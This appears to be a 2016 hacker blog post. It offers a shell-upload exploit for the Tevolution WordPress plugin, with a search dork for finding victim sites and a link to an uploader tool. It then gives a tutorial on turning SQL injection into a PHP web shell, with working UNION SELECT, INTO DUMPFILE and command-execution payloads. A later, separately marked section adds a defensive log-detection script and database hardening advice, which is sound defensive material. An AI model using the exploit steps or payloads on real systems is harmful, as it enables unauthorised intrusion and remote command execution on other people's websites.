Tuesday, 29 November 2016

Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability


######################
# Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
# Vendor Homepage : https://templatic.com/
# version : 2.3.1
# Tools by @MasterZombie :Shell Uploader:https://userscloud.com/eqdkxph1lmwt
######################
# [+] DESCRIPTION :
######################
# [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
# [+] Some of the features it enables include custom post types, monetization options, custom fields…
# [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
######################
# [+] USAGE :
######################
# 1.- Download Wordpress Tevolution Plugin Arbitrary Shell Uploader:https://userscloud.com/eqdkxph1lmwt
# 2.- Use Dork and Choose One Of the Website
# 3.- Edit The Uploader
# 4.- Upload Your File using Tamperdata : shell.php.jpg or shell.php.txt
######################
# [+] Dev!l Path :
######################
# http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/zombie.php
######################
# [+] Live Demo :
######################

SQLi to PHP Shell Upload

Salam From MasterZombie
This is just a little tip on what you can do if your SQLi vulnerable site doesn't have valuable information in the database.

I am not going to go too deep into every single move but if you have basic knowledge in Web application hacking I think you will understand what I am doing.

First we have our SQL Injection vulnerable site:

Code:
www.target.com/index.php?id=-1 union select 1,2,3--

Now we would like to know the directory we are currently in; we have a great command for this:

Code:
www.target.com/index.php?id=-1 union select 1,2,@@datadir--

Ah, splendid, it outputs: /var/www/html/

Now, what we would like to do is try to save a file on the server, like this:

Code:
www.target.com/index.php?id=-1 union select null,null,'test' INTO OUTFILE '/var/www/html/test.txt'--

To check if this worked, we would go to http://www.target.com/test.txt

If you see an empty document with only the word "test" printed on the screen, then we are good to go.


As for the actual fun, we are now going to upload a simple PHP shell on our target:
Code:
www.target.com/index.php?id=-1 union+select+null,null,'<?php%20@system($_REQUEST["cmd"]);%20?>'+INTO+DUMPFILE+'/var/www/html/shell.php'--

Now we check whether the shell works by visiting it and choosing a command to execute:
Code:
www.target.com/shell.php?cmd=uname -a

You know the deal, if it returns something like:

"Linux target 2.6.18-blablabla #1 SMP Fri Dec 17 13:37:00 2010 i686 athlon i1337 GNU/Linux"

Then it means it worked.
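
Seen from the defender's side, the sequence above leaves a recognisable trail in the web server access log. The following is an added example, not part of the original post: a small log check that flags the system-variable probe, the INTO OUTFILE/DUMPFILE write, and any later request for the file that was written. The log format, the web root /var/www/html, the function name analyze and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines; addresses are documentation ranges and
# the written file content is a harmless placeholder ('x').
SAMPLE_LOG = """\
203.0.113.7 - - [29/Nov/2016:10:00:01 +0000] "GET /index.php?id=-1%20union%20select%201,2,@@datadir-- HTTP/1.1" 200 512
203.0.113.7 - - [29/Nov/2016:10:00:09 +0000] "GET /index.php?id=-1+union+select+null,null,'x'+INTO+DUMPFILE+'/var/www/html/shell.php'-- HTTP/1.1" 200 498
198.51.100.4 - - [29/Nov/2016:10:00:12 +0000] "GET /index.php?id=7 HTTP/1.1" 200 2048
203.0.113.7 - - [29/Nov/2016:10:00:20 +0000] "GET /shell.php?cmd=uname%20-a HTTP/1.1" 200 97
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
UNION_SELECT = re.compile(r"\bunion\b.+?\bselect\b", re.I | re.S)
FILE_WRITE = re.compile(r"\binto\s+(?:out|dump)file\s+'([^']+)'", re.I)
SYSTEM_VAR = re.compile(r"@@\w+")


def analyze(log_text, web_root="/var/www/html"):
    """Return (line_no, client, kind, detail) findings for the three stages."""
    root = web_root.rstrip("/")
    dropped = set()   # URL paths of files an injection tried to write
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        query = unquote_plus(parts.query)   # decodes %20 and '+' alike
        write = FILE_WRITE.search(query)
        if write:
            path = write.group(1)
            findings.append((line_no, client, "sqli-file-write", path))
            if path.startswith(root + "/"):
                dropped.add(path[len(root):])   # map filesystem path to URL path
        elif UNION_SELECT.search(query) and SYSTEM_VAR.search(query):
            findings.append((line_no, client, "sqli-recon", query))
        elif parts.path in dropped:
            findings.append((line_no, client, "dropped-file-access", f"{parts.path} -> {status}"))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The write step only succeeds when the application's MySQL account holds the FILE privilege, secure_file_priv permits the target directory, and the database server's OS user can write into the web root. Revoking FILE from the web application's account and pointing secure_file_priv at a dedicated directory outside the web root closes this path even when an injection remains.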